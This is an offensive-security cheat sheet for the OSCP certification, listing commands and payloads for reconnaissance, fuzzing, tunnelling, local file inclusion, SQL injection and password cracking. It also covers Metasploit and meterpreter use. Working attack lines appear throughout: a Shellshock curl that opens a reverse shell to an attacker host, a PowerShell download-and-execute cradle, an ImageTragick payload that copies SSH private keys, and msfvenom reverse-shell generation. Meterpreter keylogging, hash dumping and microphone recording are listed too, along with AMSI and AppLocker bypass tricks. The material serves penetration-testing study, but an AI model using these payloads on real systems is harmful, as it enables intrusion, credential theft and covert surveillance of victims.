Commands, Payloads and Resources for the Offensive Security Certified Professional Certification.
DISCLAIMER: A guy on Twitter has a point. Automatic exploitation tools like sqlmap are prohibited in the exam. The same goes for the automatic exploitation functionality of LinPEAS. I am not keeping track of current guidelines related to those tools. For that reason I want to point out that I am not responsible if anybody uses a tool without double checking the latest exam restrictions and fails the exam. Inform yourself before taking the exam!
I removed sqlmap because of the reasons above, but Metasploit is still part of the guide because you can use it for one specific module. Thank you Muztahidul Tanim for making me aware and yeep for the resources.
Here are the links to the OSCP Exam Guide and the discussion about LinPEAS. I hope this helps.
doas -u <USERNAME> /bin/sh
certutil -urlcache -split -f "http://<LHOST>/<FILE>" <FILE>
./chisel server -p 9002 -reverse -v
./chisel client <RHOST>:9002 R:9003:127.0.0.1:8888
gcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit
i686-w64-mingw32-gcc -o main32.exe main.c
x86_64-w64-mingw32-gcc -o main64.exe main.c
nc -lnvp <LPORT> < <FILE>
nc <RHOST> <RPORT> > <FILE>
ping -c 1 <RHOST>
ping -n 1 <RHOST>
sudo python -m SimpleHTTPServer 80
sudo python3 -m http.server 80
xfreerdp /v:<RHOST> /u:<USERNAME> /p:<PASSWORD> +clipboard
rdesktop <RHOST>
ssh user@<RHOST> -oKexAlgorithms=+diffie-hellman-group1-sha1
ssh -R 8080:<LHOST>:80 <RHOST>
ssh -L 8000:127.0.0.1:8000 <USERNAME>@<RHOST>
ssh -N -L 1234:127.0.0.1:1234 <USERNAME>@<RHOST>
ssh -L 80:<LHOST>:80 <RHOST>
ssh -L 127.0.0.1:80:<LHOST>:80 <RHOST>
ssh -L 80:localhost:80 <RHOST>
ctrl b + w # show windows
ctrl + " # split window horizontal
ctrl + % # split window vertical
ctrl + , # rename window
ctrl + { # flip window
ctrl + } # flip window
ctrl + spacebar # switch pane layout
Copy & Paste
:setw -g mode-keys vi
1. ctrl b + [
2. space
3. enter
4. ctrl b + ]
Search
ctrl b + [ # enter copy
ctrl + / # enter search while within copy mode for vi mode
n # search next
shift + n # reverse search
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl + z
stty raw -echo
fg
Enter
Enter
export TERM=xterm
:w !sudo tee %  # save file with elevated privileges without exiting
Windows Command Formatting
echo "<COMMAND>" | iconv -f UTF-8 -t UTF-16LE | base64 -w0
sudo nmap -A -T4 -p- -sS -sV -oN initial --script discovery <RHOST>  # discovery scan
sudo nmap -A -T4 -sC -sV --script vuln <RHOST>  # vulnerability scan
sudo nmap -sU <RHOST>  # udp scan
sudo nmap -sC -sV -p- --scan-delay 5s <RHOST>  # delayed scan
sudo nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test' <RHOST>  # kerberos enumeration
ls -lh /usr/share/nmap/scripts/*ssh*
locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb
whois <RHOST>
host <RHOST> <RHOST>
host -l <RHOST> <RHOST>
dig @<RHOST> -x <RHOST>
dig {a|txt|ns|mx} <RHOST>
dig {a|txt|ns|mx} <RHOST> @ns1.<RHOST>
dig axfr @<RHOST> <RHOST>  # zone transfer
ldapsearch -x -w <PASSWORD>
ldapsearch -x -h <RHOST> -s base namingcontexts
ldapsearch -x -b "dc=<RHOST>,dc=local" "*" -h <RHOST> | awk '/dn: /{print $2}'
ldapsearch -x -D "cn=admin,dc=<RHOST>,dc=local" -s sub "cn=*" -h <RHOST> | awk '/uid: /{print $2}' | nl
ldapsearch -D "cn=admin,dc=acme,dc=com" "(objectClass=*)" -w ldapadmin -h ldap.acme.com
ldapsearch -x -h <RHOST> -D "<USERNAME>" -b "dc=<RHOST>,dc=local" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
sslyze --heartbleed <RHOST>
nbtscan <RHOST>
enum4linux -a <RHOST>
IEX (New-Object Net.WebClient).DownloadString('http://<LHOST>:<LPORT>/jaws-enum.ps1')
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t <RHOST>
curl -s -k "https://jldc.me/anubis/subdomains/example.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d'
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://<RHOST>/FUZZ -mc 200,204,301,302,307,401 -o results.txt
ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://<RHOST>/ -H "Host: FUZZ.<RHOST>" -fs 185
ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http://<RHOST>/backups/backup_2020070416FUZZ.zip
ffuf -u https://<RHOST>/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://<RHOST>/admin../admin_staging/index.php?page=FUZZ -fs 15349
Fuzzing with PHP Session ID
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u "http://<RHOST>/admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/basic/FUZZ -recursion
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/ext/logs/FUZZ -e .log
No 404 Header
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/no404/FUZZ -fs 669
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<RHOST>/cd/param/data?FUZZ=1
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http://<RHOST>/cd/rate/FUZZ -mc 200,429
seq 1 1000 | ffuf -w - -u http://<RHOST>/cd/pipes/user?id=FUZZ
#!/bin/bash
# hashit: read one value per line from stdin and print it as an MD5 hex digest
# (argument "md5"), Base64-encoded (argument "b64") or unchanged (no argument).
while read -r i
do
    if [ "$1" == "md5" ]; then
        echo -n "$i" | md5sum | awk '{ print $1 }'
    elif [ "$1" == "b64" ]; then
        echo -n "$i" | base64
    else
        echo "$i"
    fi
done
Use the script above for Base64 decoding
seq 1 1000 | /usr/local/bin/hashit b64 | ffuf -w - -u http://<RHOST>/cd/pipes/user2?id=FUZZ
MD5 Discovery using the Script
seq 1 1000 | /usr/local/bin/hashit md5 | ffuf -w - -u http://<RHOST>/cd/pipes/user3?id=FUZZ
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.<RHOST>" -u http://<RHOST> -fs 1495
Massive File Extension Discovery
ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://<RHOST>/FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip
-e          // extended mode that renders the full url
-k          // skip ssl certificate validation
-r          // follow redirects
-s          // status codes
-b          // exclude status codes
-k          // ignore certificates
--wildcard  // set wildcard option
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<RHOST>/
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://<RHOST>/ -x php
$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://<RHOST>/ -x php,txt,html,js -e -s 200
$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u https://<RHOST>:<RPORT>/ -b 200 -k --wildcard
txt,bak,php,html,js,asp,aspx
Common Picture Extensions
gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://<RHOST>/api/ -e -s 200
gobuster dns -d <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
gobuster vhost -u <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<RHOST>/ -a Linux
Local File Inclusion (LFI)
http://<RHOST>/<FILE>.php?file=
http://<RHOST>/<FILE>.php?file=../../../../../../../../etc/passwd
http://<RHOST>/<FILE>/php?file=../../../../../../../../../../etc/passwd
http://<RHOST>/<FILE>/php?file=../../../../../../../../../../etc/passwd%00
Encoded Traversal Strings
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\
http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=index
base64 -d <FILE>.php
/etc/passwd
/etc/shadow
/etc/aliases
/etc/anacrontab
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/at.allow
/etc/at.deny
/etc/bashrc
/etc/bootptab
/etc/chrootUsers
/etc/chttp.conf
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/cups/cupsd.conf
/etc/exports
/etc/fstab
/etc/ftpaccess
/etc/ftpchroot
/etc/ftphosts
/etc/groups
/etc/grub.conf
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/etc/httpd/access.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/php.ini
/etc/httpd/srm.conf
/etc/inetd.conf
/etc/inittab
/etc/issue
/etc/lighttpd.conf
/etc/lilo.conf
/etc/logrotate.d/ftp
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/lsb-release
/etc/motd
/etc/modules.conf
/etc/motd
/etc/mtab
/etc/my.cnf
/etc/my.conf
/etc/mysql/my.cnf
/etc/network/interfaces
/etc/networks
/etc/npasswd
/etc/passwd
/etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache/php.ini
/etc/php4/cgi/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/apache/php.ini
/etc/php/cgi/php.ini
/etc/php.ini
/etc/php/php4/php.ini
/etc/php/php.ini
/etc/printcap
/etc/profile
/etc/proftp.conf
/etc/proftpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/putreftpd.pdb
/etc/redhat-release
/etc/resolv.conf
/etc/samba/smb.conf
/etc/snmpd.conf
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/sysconfig/network
/etc/syslog.conf
/etc/termcap
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/logs/pure-ftpd.log
/logs/security_debug_log
/logs/security_log
/opt/lampp/etc/httpd.conf
/opt/xampp/etc/php.ini
/proc/cpuinfo
/proc/filesystems
/proc/interrupts
/proc/ioports
/proc/meminfo
/proc/modules
/proc/mounts
/proc/<PID>/cmdline
/proc/<PID>/maps
/proc/stat
/proc/swaps
/proc/version
/proc/self/net/arp
/proc/self/cwd/app.py
/proc/sched_debug
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/root/anaconda-ks.cfg
/usr/etc/pure-ftpd.conf
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/apache/conf/modsec.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/audit_log
/usr/local/apache/error_log
/usr/local/apache/error.log
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.ini
/usr/local/php/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdn
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/httpd_log
/usr/local/Zend/etc/php.ini
/usr/sbin/pure-config.pl
/var/adm/log/xferlog
/var/apache2/config.inc
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD
/var/local/www/conf/php.ini
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/auth.log
/var/log/boot
/var/htmp
/var/log/chttp.log
/var/log/cups/error.log
/var/log/daemon.log
/var/log/debug
/var/log/dmesg
/var/log/dpkg.log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_paniclog
/var/log/exim.paniclog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/faillog
/var/log/ftplog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd-access.log
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/error_log
/var/log/httpd/error.log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd/access.log
/var/log/lighttpd/error.log
/var/log/lighttpd/lighttpd.access.log
/var/log/lighttpd/lighttpd.error.log
/var/log/mail.info
/var/log/mail.log
/var/log/maillog
/var/log/mail.warn
/var/log/message
/var/log/messages
/var/log/mysqlderror.log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/log/proftpd
/var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/secure
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/mysql.log
/var/run/utmp
/var/spool/cron/crontabs/root
/var/webmin/miniserv.log
/var/www/<vhost>/__init__.py
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access_log
/var/www/logs/error_log
/var/www/logs/access.log
/var/www/logs/error.log
~/.atfp_history
~/.bash_history
~/.bash_logout
~/.bash_profile
~/.bashrc
~/.gtkrc
~/.login
~/.logout
~/.mysql_history
~/.nano_history
~/.php_history
~/.profile
~/.ssh/authorized_keys
~/.ssh/id_dsa
~/.ssh/id_dsa.pub
~/.ssh/id_rsa
~/.ssh/id_rsa.pub
~/.ssh/identity
~/.ssh/identity.pub
~/.viminfo
~/.wm_style
~/.Xdefaults
~/.xinitrc
~/.Xresources
~/.xsession
C:/Users/Administrator/NTUser.dat
C:/Documents and Settings/Administrator/NTUser.dat
C:/apache/logs/access.log
C:/apache/logs/error.log
C:/apache/php/php.ini
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:/MySQL/data/hostname.err
C:/MySQL/data/mysql.err
C:/MySQL/data/mysql.log
C:/MySQL/my.cnf
C:/MySQL/my.ini
C:/php4/php.ini
C:/php5/php.ini
C:/php/php.ini
C:/Program Files/Apache Group/Apache2/conf/httpd.conf
C:/Program Files/Apache Group/Apache/conf/httpd.conf
C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log
C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/MySQL/data/hostname.err
C:/Program Files/MySQL/data/mysql-bin.log
C:/Program Files/MySQL/data/mysql.err
C:/Program Files/MySQL/data/mysql.log
C:/Program Files/MySQL/my.ini
C:/Program Files/MySQL/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/my.ini
C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/access.log
C:/Program Files (x86)/Apache Group/Apache/conf/error.log
C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml
C:/Program Files (x86)/xampp/apache/conf/httpd.conf
C:/WINDOWS/php.ini
C:/WINDOWS/Repair/SAM
C:/Windows/repair/system
C:/Windows/repair/software
C:/Windows/repair/security
C:/WINDOWS/System32/drivers/etc/hosts
C:/Windows/win.ini
C:/WINNT/php.ini
C:/WINNT/win.ini
C:/xampp/apache/bin/php.ini
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml
C:/Windows/debug/NetSetup.log
C:/Windows/system32/config/AppEvent.Evt
C:/Windows/system32/config/SecEvent.Evt
C:/Windows/system32/config/default.sav
C:/Windows/system32/config/security.sav
C:/Windows/system32/config/software.sav
C:/Windows/system32/config/system.sav
C:/Windows/system32/config/regback/default
C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security
C:/Windows/system32/config/regback/system
C:/Windows/system32/config/regback/software
C:/Program Files/MySQL/MySQL Server 5.1/my.ini
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
C:/Windows/System32/inetsrv/config/applicationHost.config
C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
wfuzz -w /usr/share/wfuzz/wordlist/general/big.txt -u http://<RHOST>/FUZZ/<FILE>.php --hc '403,404'
wfuzz -w /PATH/TO/WORDLIST -c -f <FILE> -u http://<RHOST> --hc 403,404
Custom Scan with limited Output
wfuzz -w /PATH/TO/WORDLIST -u http://<RHOST>/dev/304c0c90fbc6520610abbf378e2339d1/db/file_FUZZ.txt --sc 200 -t 20
Fuzzing two Parameters at once
wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://<RHOST>:/<directory>/FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c
wfuzz --hh 0 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.<RHOST>.<tld>' -u http://<RHOST>/
wfuzz -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.<RHOST>" --hc 200 --hw 356 -t 100 <RHOST>
wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http://<RHOST>/FUZZ --hc 403,404
wfuzz -X POST -u "http://<RHOST>:<RPORT>/login.php" -d "email=FUZZ&password=<PASSWORD>" -w /PATH/TO/WORDLIST/<WORDLIST>.txt --hc 200 -c
wfuzz -X POST -u "http://<RHOST>:<RPORT>/login.php" -d "username=FUZZ&password=<PASSWORD>" -w /PATH/TO/WORDLIST/<WORDLIST>.txt --ss "Invalid login"
wfuzz -c -z file,/usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -d 'db=FUZZ' --hl 16 http://<RHOST>/select
wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Origin: http://FUZZ.<RHOST>" --filter "r.headers.response~'Access-Control-Allow-Origin'" http://<RHOST>/
wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,404,403 -H "Host: FUZZ.<RHOST>" -u http://<RHOST> -t 100
wfuzz -c -w /usr/share/wordlists/secLists/Discovery/DNS/subdomains-top1million-110000.txt --hc 400,403,404 -H "Host: FUZZ.<RHOST>" -u http://<RHOST> --hw <value> -t 100
wfuzz -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt --hw 31 http://10.13.37.11/backups/backup_2021052315FUZZ.zip
wfuzz -u 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline' -z range,900-1000
wpscan --url https://<RHOST> --disable-tls-checks
wpscan --url https://<RHOST> --disable-tls-checks --enumerate u
target=<RHOST>; wpscan --url http://$target:80 --enumerate u,t,p | tee $target-wpscan-enum
wpscan --url http://<RHOST> -U <USERNAME> -P passwords.txt -t 50
show databases;
use <DATABASE>;
show tables;
SELECT * FROM *;
mysql -u <USERNAME> -h <RHOST> -p
admin' or '1'='1
' or '1'='1
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1--
" or 1=1-
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1-
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1`='1-
'-'
' '
'&'
'^'
'*'
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
'--'
"--"
'--' / "--"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' -- -
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin';-- azer
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
sqsh -S <RHOST> -U <USERNAME>
'admin@<FQDN>'='admin@<FQDN>++++++++++++++++++++++++++++++++++++++htb'
test' or 1=1 or 'a'='a
test' or 1=2 or 'a'='a
' or substring(Password,1,1)='p' or '  # checking letter "p" on the beginning of the password
' or substring(Password,2,1)='p' or '  # checking letter "p" on the second position of the password
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt <FILE>.zip
export HYDRA_PROXY=connect://127.0.0.1:8080
unset HYDRA_PROXY
hydra <RHOST> http-form-post "/otrs/index.pl:Action=Login&RequestedURL=Action=Admin&User=root@localhost&Password=^PASS^:Login failed" -l root@localhost -P otrs-cewl.txt -vV -f
hydra -l admin -P /usr/share/wordlists/rockyou.txt <RHOST> http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=COOKIE_1&__EVENTVALIDATION=COOKIE_2&UserName=^USER^&Password=^PASS^&LoginButton=Log+in:Login failed"
/usr/share/john/ssh2john.py id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt <FILE>
john --rules --wordlist=/usr/share/wordlists/rockyou.txt <FILE>
john --show <FILE>
ImageTragick Polyglot Attack
poc.svg
<image authenticate='ff" `echo $(cat /home/<USERNAME>/.ssh/id_rsa)> /dev/shm/id_rsa`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="msl:poc.svg" height="100" width="100" />
  </svg>
</image>
$ convert poc.svg poc.png
sudo msfdb init  // database initialization
msf6 > search  // search within metasploit
msf6 > set RHOST <RHOST>  // set remote host
msf6 > set RPORT <RPORT>  // set remote port
msf6 > run  // run exploit
msf6 > spool /PATH/TO/FILE  // recording screen output
msf6 > save  // saves current state
msf6 > exploit  // using module exploit
msf6 > payload  // using module payload
msf6 > auxiliary  // using module auxiliary
msf6 > encoder  // using module encoder
msf6 > nop  // using module nop
msf6 > show sessions  // displays all current sessions
msf6 > sessions -i 1  // switch to session 1
msf6 > db_nmap -sC <RHOST>  // using nmap
msf6 > jobs  // showing all current jobs
msf6 > hosts  // displaying hosts
msf6 > services  // displaying services
msf6 > vulns  // displaying vulnerabilities
msf6 > show payloads  // displaying available payloads
msf6 > set VERBOSE true  // enable verbose output
msf6 > set forceexploit true  // exploits the target anyways
msf6 > use post/multi/manage/shell_to_meterpreter  // shell to meterpreter
msf6 > use exploit/windows/http/oracle_event_processing_upload  // use a specific module
C:\> Ctrl + z  // put active meterpreter shell in background
meterpreter > background  // put meterpreter in background (same as "bg")
meterpreter > shell  // get a system shell
meterpreter > channel -i <ID>  // get back to existing meterpreter shell
meterpreter > ps  // checking processes
meterpreter > migrate 2236  // migrate to a process
meterpreter > getuid  // get the user id
meterpreter > sysinfo  // get system information
meterpreter > upload  // uploading local files to the target
meterpreter > ipconfig  // get network configuration
meterpreter > load kiwi  // load mimikatz
meterpreter > getprivs  // get privileges after loading mimikatz
meterpreter > getsystem  // gain system privileges if user is member of administrator group
meterpreter > hashdump  // dumps all the user hashes
meterpreter > run post/windows/gather/checkvm  // check status of the target
meterpreter > run post/multi/recon/local_exploit_suggester  // checking for exploits
meterpreter > run post/windows/manage/enable_rdp  // enables rdp
meterpreter > run post/multi/manage/autoroute  // runs autoroutes
meterpreter > run auxiliary/server/socks4a  // runs socks4 proxy server
meterpreter > keyscan_start  // enables keylogger
meterpreter > keyscan_dump  // showing the output
meterpreter > screenshare  // realtime screen sharing
meterpreter > screenshare -q 100  // realtime screen sharing
meterpreter > record_mic  // recording mic output
meterpreter > timestomp  // modify timestamps
meterpreter > execute -f calc.exe  // starts a program on the victim
meterpreter > portfwd add -l <LPORT> -p <RPORT> -r 127.0.0.1  // port forwarding
Metasploit through Proxychains
proxychains -q msfconsole
Auxiliary Output Directory
/home/kali/.msf4/loot/20200623090635_default_<RHOST>_nvms.traversal_680948.txt
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter_payload.exe
Setup Listener for Microsoft Windows
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o <FILE>.exe
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1' http://<RHOST>/cgi-bin/user.sh
PS C:\> $str = 'amsiinitfailed'
PS C:\> $str = 'ams' + 'ii' + 'nitf' + 'ailed'
Bypass List (Windows 10 Build 1803):
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
